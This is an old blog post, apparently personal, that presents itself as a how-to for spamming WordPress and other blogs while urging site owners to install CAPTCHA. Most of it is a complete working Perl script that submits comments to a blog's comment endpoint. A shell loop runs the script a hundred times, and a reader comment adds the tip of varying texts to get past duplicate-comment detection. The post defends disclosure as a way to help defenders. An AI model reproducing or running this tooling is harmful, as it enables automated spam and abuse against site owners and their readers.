Spamming Blogs — Howto
Disclaimer:
- A renunciation of any claim to or connection with
- Disavowal
- A statement made to save one’s ass
That’s not my definition, I found it at the movie “Dogma”.
Anyway, This post doesn’t aim to encourage you to spam else’s blog, but this is a message to those who underestimate the spam effect that shows how easy and simple it’s possible to do it with a simple Perl interpreter that doesn’t require any extra packages and an Internet connection, more or less fast.
This post also persuades you to install a Captcha module that makes spams more difficult.
Thinking “Let them spam and I will manually delete bad comments” is a very bad idea: I have been experiencing more than 100 spam per day on my blog; and setting keywords that move the spam comment to the moderation queue is not safe neither: The filter is not intelligent, sometimes it can’t detect spam, or worse, deletes a “good” comment.
Solution? Install Captcha (I say it again).
To those who claim that this kind of sensitive information should not be posted in public I would say “I am against hiding any kind of information: I put the attack method so that users know how to defend themselves. Spammers don’t need my post to learn how to spam: They work in big companies and they are paid to spam”.
Well, let’s start, here’s a Perl script that spams a WordPress blog
#!/usr/bin/perl -w
use strict;
use warnings;
use POSIX;
use HTTP::Request::Common;
use LWP;
use LWP::UserAgent;
die(
"Usage:\n$0 \"Target url\" \"Your name\" \"Your mail\" \"Your homepage\" \"\ File containing comments\" \"Article ID\" \n"
)
unless $#ARGV == 5;
my $target = $ARGV[0]; # First argument: URL of wordpress blog
if ( ( $target =~ /^http:\/\/.*\..*$/ ) == 0 ) {
die("First argument must be an URL!\n");
}
my $author = $ARGV[1];
my $email = $ARGV[2];
if ( ( $email =~ /^.*\@.*\..*$/ ) == 0 ) {
die("Third argument must be a valid mail address!\n");
}
my $homepage = $ARGV[3];
if ( ( $homepage =~ /^http:\/\/.*\..*$/ ) == 0 ) {
die("You should have your valid home page 
\n");
}
my $comment = $ARGV[4];
if ( !-f $comment ) {
die
"5th argument must be a valid file from which comment will be extracted!\n";
}
my $id = $ARGV[5]; # post ID
if ( ( $id =~ /\d+/ ) == 0 ) {
die "Please enter target ID\n";
}
my $content = "";
open CONTENT, $comment;
while (<CONTENT>) {
$content .= $_;
}
my $comment_target = "/wp-comments-post.php";
my $full_url = $target . $comment_target;
my $ua = LWP::UserAgent->new();
my $req = POST $full_url,
[
author => $author,
email => $email,
url => $homepage,
comment => $content,
comment_post_ID => $id,
submit => 1
];
my $result =
$ua->request($req)->as_string; # The devil's action
print $result;
print $#ARGV;
Very simple, this is useful to spam one post, but how about
for i in $(seq 1 100); do
spam.pl "Target url" "Your name" "Your mail" "Your homepage" source{i}.txt "Article ID"
? Without Captcha, it works!
In the same way, you may spam any blog platform: dot-clear, blogger, … or even sky blog, blog spirit or whatever. It’s possible as long as comments are open to anyone and no typing a Captcha number is required.
May 10th, 2006 at 3:50 pm
Really interesting .. je suis du même avis, plus on connait nos faiblesses et mieux l’on pourra se protéger
Je reviendrais jeter un coup d’oeil sur le code
See u
Ps : c la 4 eme fois ke jessaye de poster ce comment .. comme koi trop de sécurité tue l’objet meme du blog
May 10th, 2006 at 3:55 pm
Freedom or Security, one has to choose…
What was the problem regarding posting the comment?
May 15th, 2006 at 11:36 am
Ben en fait pr le comment si tu cliques sur newID alors ke ta deja écris ton message ben tu perds ton message. Pareil quand tu fait actualiser la page ou kon tu trompes justement en entrant l’ID, tu perds aussi le message ke ta écris et tu dois re-entrer le tt .. c po le cas ds blogger par exemple
May 15th, 2006 at 12:58 pm
When you refresh the comment, Wordpress automatically detects an ident message and prevents you from posting it again. That’s the reason for using different texts while spamming